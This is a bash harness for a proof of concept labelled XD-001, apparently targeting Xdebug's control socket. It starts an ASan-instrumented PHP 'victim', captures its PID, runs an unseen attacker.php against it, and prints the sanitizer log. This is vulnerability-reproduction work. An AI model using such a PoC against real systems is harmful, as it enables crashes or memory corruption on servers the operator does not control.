#!/usr/bin/env bash
# XD-001 PoC orchestrator. See README.txt for prerequisites.
#
# Edit these three paths to match your environment:

PHP=${PHP:-/home/ilia/php-src-8.4/sapi/cli/php}
XDEBUG_SO=${XDEBUG_SO:-/home/ilia/xdebug/modules/xdebug.so}
ATTACKER_PHP=${ATTACKER_PHP:-php}

set -u
HERE=$(dirname "$0")

if [ ! -x "$PHP" ];          then echo "PHP=$PHP not executable"; exit 2; fi
if [ ! -f "$XDEBUG_SO" ];    then echo "XDEBUG_SO=$XDEBUG_SO not found"; exit 2; fi
if ! command -v "$ATTACKER_PHP" >/dev/null; then
    echo "ATTACKER_PHP=$ATTACKER_PHP not found in PATH"; exit 2
fi

VICTIM_OUT=$(mktemp)
trap 'rm -f "$VICTIM_OUT"' EXIT

echo "spawning ASan-instrumented victim ..."
ASAN_OPTIONS=detect_leaks=0:abort_on_error=0:halt_on_error=0:print_stacktrace=1 \
"$PHP" \
    -d zend_extension="$XDEBUG_SO" \
    -d xdebug.mode=develop \
    -d xdebug.control_socket=default \
    "$HERE/victim.php" \
    >"$VICTIM_OUT" 2>&1 &
VICTIM_BG=$!

# Wait for the victim to print its PID and bind the socket.
sleep 1
PID=$(grep -oE 'pid=[0-9]+' "$VICTIM_OUT" | head -1 | cut -d= -f2)
if [ -z "$PID" ]; then
    echo "victim never printed its PID. Output:"
    cat "$VICTIM_OUT"
    kill "$VICTIM_BG" 2>/dev/null || true
    exit 3
fi
echo "victim pid=$PID"

echo
echo "running attacker ..."
"$ATTACKER_PHP" "$HERE/attacker.php" "$PID"

# Let the victim finish so ASan flushes its log.
wait "$VICTIM_BG" 2>/dev/null

echo
echo "---ASan victim log (tail) ---"
tail -80 "$VICTIM_OUT"